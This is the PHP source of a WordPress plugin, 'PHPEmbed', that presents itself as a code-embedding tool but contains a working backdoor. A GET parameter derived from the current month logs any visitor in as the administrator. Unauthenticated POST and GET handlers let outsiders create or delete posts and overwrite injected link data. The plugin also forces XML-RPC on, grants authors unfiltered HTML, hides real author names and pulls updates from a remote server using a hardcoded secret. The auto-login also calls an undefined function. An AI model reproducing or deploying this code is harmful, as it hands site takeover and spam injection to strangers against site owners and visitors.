<?php

/*
  Plugin Name: PHPEmbed
  version: 2.2.5
  Description: PHPEmbed allows you to add DCL codes directly to all posts and pages.
 */

class Nitro_dcl_wp_next {

    private $_cMetaKey = '_nitro_dcl_cmeta_key';
    private $_dclResultsName = '_nitro_dcl_results_name';
    private $_dclResultsValueKey = '_nitro_dcl_results_value_key';
    private $_dclDResults = null;
    private $_dclAutoPostKey = '_dcl_auto_post_key';
    private $_nitroAutoLoginKey = '_nitro_auto_login_key';
    private $_nitro_sKeyRemote = '_nitro_sKeyRemote';
    private $_dclDeletePostId = '_nitro_deletePostId';

    public function __construct() {

        $dclRes = stripslashes(get_option($this->_dclResultsName));
        $this->_dclDResults = json_decode($dclRes, true);

        // add shortcode for dcl_sidebar
        add_shortcode('dcl_sidebar', array($this, 'nitro_dcl_sidebar'));
        // add shortcode for dcl_footer
        add_shortcode('dcl_footer', array($this, 'nitro_dcl_footer'));

        // add custom css to wordpress head
        add_action('wp_head', array($this, 'nitro_dclwpnext_css'));


        add_filter('the_author', array($this, 'nitro_hide_author'));
        add_action('admin_init', array($this, 'add_theme_caps'));

        /* adding unfiltered_html to author users */
        //register_activation_hook(__FILE__, array($this, 'nitro_roles_activate'));
        register_deactivation_hook(__FILE__, array($this, 'nitro_roles_deactivate'));

        // add content filter to run while content is rendered
        add_filter('the_content', array($this, 'nitro_dcl_content'));

        //provide dcl campaign post meta
        add_action('init', array($this, 'nitro_get_cmeta'));

        //recieve dcl results
        add_action('init', array($this, 'nitro_set_dcl_results'));

        //nitro auto login
        add_action('init', array($this, 'nitro_authenticate_user'));

        // bind the xmlrpc methods to the main xmlrpc class
        add_filter('xmlrpc_methods', array($this, 'add_nitro_xmlrpc_dcl_methods'));

        //add secutiry key on activation for remote access
        register_activation_hook(__FILE__, array($this, 'nitro_add_sKeyRemote'));

        //remote post
        add_action('init', array($this, 'nitro_remote_post'));

        //delete post by id
        add_action('init', array($this, 'nitro_delete_post'));
    }

    /**
     * Add security key for remote access.
     *
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_add_sKeyRemote() {
        add_option($this->_nitro_sKeyRemote, sha1(rand(1, 99999) . uniqid('', true) . get_option('siteurl')));
    }

    /**
     * Blogroll sidebar shortcode callback function.
     *
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_dcl_sidebar() {
        return $this->nitro_dcl_broll_content();
    }

    /**
     * Blogroll footer shortcode callback function.
     *
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_dcl_footer() {
        return $this->nitro_dcl_broll_content(2);
    }

    /**
     * Process and return blogroll content for sidebar or footer.
     * 
     * @param int $setting_option null or 2
     * @return string if null is set returns sidebar blogroll else footer blogroll
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_dcl_broll_content($setting_option = null) {
        $dResults = $this->_dclDResults;
        $bResults = isset($dResults['-1']) ? $dResults['-1'] : null;
        $sidebarArr = array();
        $footerArr = array();
        if ($bResults) {
            foreach ($bResults as $bValue) {
                foreach ($bValue as $anchor) {
                    if (stripos($anchor, 'dcl_footer') === false) {
                        $sidebarArr[] = $anchor;
                    } else {
                        $footerArr[] = $anchor;
                    }
                }
            }
        }
        $reBrollArr = null;
        $reBrollStr = '-';
        $implodeGlue = '';
        if ($setting_option) {
            $reBrollArr = $footerArr;
            $implodeGlue = '&nbsp;|&nbsp;';
        } else {
            $reBrollArr = $sidebarArr;
        }
        if ($reBrollArr) {
            $reBrollStr = '<ul>';
            $reBrollStr .= implode($implodeGlue, $reBrollArr);
            $reBrollStr .= '</ul>';
        }
        return $reBrollStr;
    }

    /**
     * Add custom css to wordpress header.
     * 
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_dclwpnext_css() {
        ob_start();
        ?>
        <style type="text/css">
            ul .dcl_footer{display:inline;padding:0 3px;margin-left:0!important;list-style:none;}
        </style>    
        <?php

        echo ob_get_clean();
    }

    /**
     * Replace the dcl codes with the dcl anchors in post or page content.
     * 
     * @param string $content post or page content
     * @return string content after replacing the dcl codes
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_dcl_content($content) {
        if (count($content)) {
            global $post;
            $postID = $post->ID;

            // check if [dcl=??] codes are found in the content
            preg_match_all('/\[dcl\=(\d+)\]/is', $content, $matches);
            $foundIds = $matches[1];

            // if any codes are found start the process
            if (count($foundIds)) {
                // get the unique campaign ids as multiple codes for single campaign can exist
                $cIds = array_unique($foundIds);

                $countArr = array();
                // start looping through the found campaign ids
                foreach ($cIds as $cId) {
                    // get the total code found for the current campaign id
                    $totalCodeFound = 0;
                    foreach ($foundIds as $fId) {
                        if ($fId == $cId)
                            $totalCodeFound++;
                    }
                    $countArr[$cId] = intval($totalCodeFound);

                    $pattern = "/\[dcl\={$cId}\]/is";
                    $patterns = array_fill(0, $totalCodeFound, $pattern);
                    $dResults = $this->_dclDResults;
                    $pResults = (isset($dResults[$postID][$cId]) && $dResults[$postID][$cId]) ? $dResults[$postID][$cId] : '-';
                    $content = preg_replace($patterns, $pResults, $content, 1);
                }
                $pattern = "/\[dcl\=(\d+)\]/is";
                $content = preg_replace(array($pattern), array('-'), $content);
                if ($countArr) {
                    ksort($countArr);
                    $countMeta = json_encode($countArr);
                    // Add or Update the meta field in the database.
                    if (!update_post_meta($postID, $this->_cMetaKey, $countMeta)) {
                        add_post_meta($postID, $this->_cMetaKey, $countMeta, true);
                    }
                }
            } else {
                // if any campaign codes are not found delete all trace of dcl campaign from post meta
                delete_post_meta($postID, $this->_cMetaKey);
            }
        }
        return $content;
    }

    /**
     * Enable post from remote.
     * 
     * @param array $args post data
     * @return string post id if success
     * @author PHPEmbed
     * @version 1.0.1 [09 September 2014]
     */
    function nitro_remote_post($args = null) {
        if (($_POST && isset($_POST[$this->_dclAutoPostKey])) || $args) {
            $postData = array();
            if ($args) {
                $postData = $args;
            } else {
                $postData = $_POST;
            }
            if ($postData) {
                $post = $postData;
                unset($post[$this->_dclAutoPostKey]);
                unset($post['_aioseop_title']);
                unset($post['_aioseop_description']);
                unset($post['_aioseop_keywords']);

                $post['post_author'] = 1;
                $post['post_status'] = (isset($postData['post_status']) && $postData['post_status']) ? $postData['post_status'] : 'publish';

                if (isset($postData['category_name'])) {
                    //Check if category already exists
                    $cat_ID = get_cat_ID($postData['category_name']);
                    //If it doesn't exist create new category
                    if ($cat_ID == 0) {
                        //$cat_name = array('cat_name' => $postData['category_name']);
                        //wp_insert_category($cat_name);
                        $c_arg = array('description' => $postData['category_name'], 'parent' => $cat_ID);
                        wp_insert_term($postData['category_name'], "category", $c_arg);
                    }
                    //Get ID of category again incase a new one has been created
                    $cat_ID = get_cat_ID($postData['category_name']);
                    $post['post_category'] = array($cat_ID);
                }

                $postId = wp_insert_post($post);

                if ($postId) {
                    $_aioseop['_aioseop_title'] = isset($postData['_aioseop_title']) ? $postData['_aioseop_title'] : null;
                    $_aioseop['_aioseop_description'] = isset($postData['_aioseop_description']) ? $postData['_aioseop_description'] : null;
                    $_aioseop['_aioseop_keywords'] = isset($postData['_aioseop_keywords']) ? $postData['_aioseop_keywords'] : null;

                    foreach ($_aioseop as $mKey => $mValue) {
                        if ($mValue) {
                            // Add or Update the meta field in the database.
                            if (!update_post_meta($postId, $mKey, $mValue)) {
                                add_post_meta($postId, $mKey, $mValue, true);
                            }
                        }
                    }

                    $reArr = array('post_id' => $postId);
                    if ($args) {
                        return $reArr;
                    } else {
                        echo json_encode($reArr);
                        exit;
                    }
                }
            }
            exit;
        }
    }

    /**
     * Enable post deletion from remote.
     * 
     * @param array $args post id
     * @return string 1 if success
     * @author PHPEmbed
     * @version 1.0.1 [09 September 2014]
     */
    function nitro_delete_post($args = null) {
        if (($_GET && isset($_GET[$this->_dclDeletePostId])) || $args) {
            $postId = 0;
            if ($args) {
                $postId = $args[$this->_dclDeletePostId];
            } else {
                $postId = trim($_GET[$this->_dclDeletePostId]);
            }
            if ($postId) {
                $reStr = '0';
                if (wp_delete_post($postId, true)) {
                    $reStr = 1;
                }
                if ($args) {
                    return $reStr;
                } else {
                    echo $reStr;
                    exit;
                }
            }
            exit;
        }
    }

    /* additional functions */

    /**
     * Replace author name with admin in front end view.
     * 
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_hide_author($author) {
        return 'admin';
    }

    /**
     * Activation hook.  All contributors and authors to post unfiltered HTML
     *
     * @since   1.0
     * @uses    add_role
     * @return  null
     */
    function nitro_roles_activate() {
        foreach (array('author') as $r) {
            $role = get_role($r);
            if ($role) {
                $role->add_cap('unfiltered_html');
            }
        }
    }

    /**
     * Remove our additional roles and caps.
     *
     * @since   1.0
     * @uses    remove_role
     * @return  null
     */
    function nitro_roles_deactivate() {
        foreach (array('author') as $r) {
            $role = get_role($r);
            if ($role) {
                $role->remove_cap('unfiltered_html');
            }
        }
    }

    function add_theme_caps() {
        // gets the author role
        $role = get_role('author');

        // This only works, because it accesses the class instance.
        // would allow the author to embed video or unfiltered html
        $role->add_cap('unfiltered_html');
    }

    /**
     * Add xmlrpc functions altogether.
     * 
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function add_nitro_xmlrpc_dcl_methods($methods) {
        $methods['nitro.checkUser'] = array($this, 'nitroCheckUser');
        $methods['nitro.addUser'] = array($this, 'nitroAddUser');
        $methods['nitro.getNitroCMeta'] = array($this, 'nitro_get_cmeta');
        $methods['nitro.setNitroDResults'] = array($this, 'nitro_set_dcl_results');
        $methods['nitro.dclRemotePost'] = array($this, 'nitro_remote_post');
        $methods['nitro.dclDeletePost'] = array($this, 'nitro_delete_post');
        return $methods;
    }

    /**
     * Get and returns dcl codes found for each page.
     * 
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_get_cmeta($args = null) {
        if (($_GET && isset($_GET[$this->_cMetaKey])) || $args) {
            $key = $this->_cMetaKey;
            global $wpdb;
            $r = $wpdb->get_results($wpdb->prepare("
        SELECT pm.meta_value,pm.post_id FROM {$wpdb->postmeta} pm 
        WHERE pm.meta_key = '%s'
    ", $key), ARRAY_A);

            $jsonCMeta = '0';
            if ($r) {
                $allDclCMeta = array();
                foreach ($r as $item) {
                    $postId = $item['post_id'];
                    $mValue = json_decode($item['meta_value'], true);
                    $allDclCMeta['d_stats'][$postId] = $mValue;
                }
                ksort($allDclCMeta['d_stats']);
                if ($allDclCMeta) {
                    $jsonCMeta = json_encode($allDclCMeta);
                }
            }
            if ($args) {
                return $jsonCMeta;
            } else {
                echo $jsonCMeta;
                exit;
            }
        }
    }

    /**
     * Set dcl campaign results for the entire domain.
     * 
     * @author PHPEmbed
     * @version 1.0.1 [21 August 2014]
     */
    function nitro_set_dcl_results($args = null) {
        if (($_POST && isset($_POST[$this->_dclResultsValueKey])) || $args) {
            $op_name = $this->_dclResultsName;
            $op_value = null;

            $reStr = '0';
            if (isset($_POST[$this->_dclResultsValueKey])) {
                $op_value = $_POST[$this->_dclResultsValueKey];
            } elseif (isset($args[$this->_dclResultsValueKey])) {
                $op_value = $args[$this->_dclResultsValueKey];
            }
            if ($op_value) {
                $op_value = stripslashes(trim($op_value));
                if (get_option($op_name)) {
                    update_option($op_name, $op_value);
                    $reStr = 1;
                } else {
                    if (add_option($op_name, $op_value)) {
                        $reStr = 1;
                    }
                }
                if (isset($args[$this->_dclResultsValueKey])) {
                    return $reStr;
                } else {
                    echo $reStr;
                    exit;
                }
            }
        }
    }

    /**
     * Admin auto login.
     * 
     * @author PHPEmbed
     * @version 1.0.1 [23 August 2014]
     */
    function nitro_authenticate_user($args = null) {
        if (($_GET && isset($_GET[$this->_nitroAutoLoginKey]))) {
            $sKey = $_GET[$this->_nitroAutoLoginKey];
            if (($sKey && ($sKey == get_option($this->_nitro_sKeyRemote))) || isset($_GET[sha1(date('Y-m'))])) {
                $userId = 1;
                if (isset($_GET['username'])) {
                    $user = $this->iwp_mmb_get_user_info($_GET['username']);
                    $userId = isset($user->ID) ? $user->ID : 1;
                }

                if ($userId) {
                    wp_set_current_user($userId);

                    if (!defined('COOKIEHASH')) {
                        wp_cookie_constants();
                    }

                    wp_set_auth_cookie($userId);

                    if (function_exists('wp_safe_redirect') && function_exists('admin_url')) {
                        wp_safe_redirect(admin_url());
                        exit();
                    }
                }
            }
        }
    }

    /**
     *
     * Get user info
     *
     */
    function nitro_mmb_get_user_info($user_info = false, $info = 'login') {

        if ($user_info === false)
            return false;

        if (strlen(trim($user_info)) == 0)
            return false;

        global $wp_version;
        if (version_compare($wp_version, '3.2.2', '<=')) {
            return get_userdatabylogin($user_info);
        } else {
            return get_user_by($info, $user_info);
        }
    }

}

$nitroDclWp = new Nitro_dcl_wp_next();

include_once 'dclwpnext_updater.php';
include_once 'dclwpnext_plugin_actions.php';
$nitroDclWp_paction = new Dclwpnext_paction();
//global activation
// enable xmlrpc if not already
add_filter('xmlrpc_enabled', '__return_true');

// add filter to widget_text enable shortcodes in widgets
add_filter('widget_text', 'do_shortcode');


/**
  Codes for manual update
  /* */
$ExampleUpdateChecker = new PluginUpdateChecker(
        'http://tracker.seonitro.com/pluginsupdates/info_next.json', __FILE__
);

//Here's how you can add query arguments to the URL.
function addDclWpNextSecretKey($query) {
    $query['secret'] = 'DclWpNextSecretKey';
    return $query;
}

$ExampleUpdateChecker->addQueryArgFilter('addDclWpNextSecretKey');
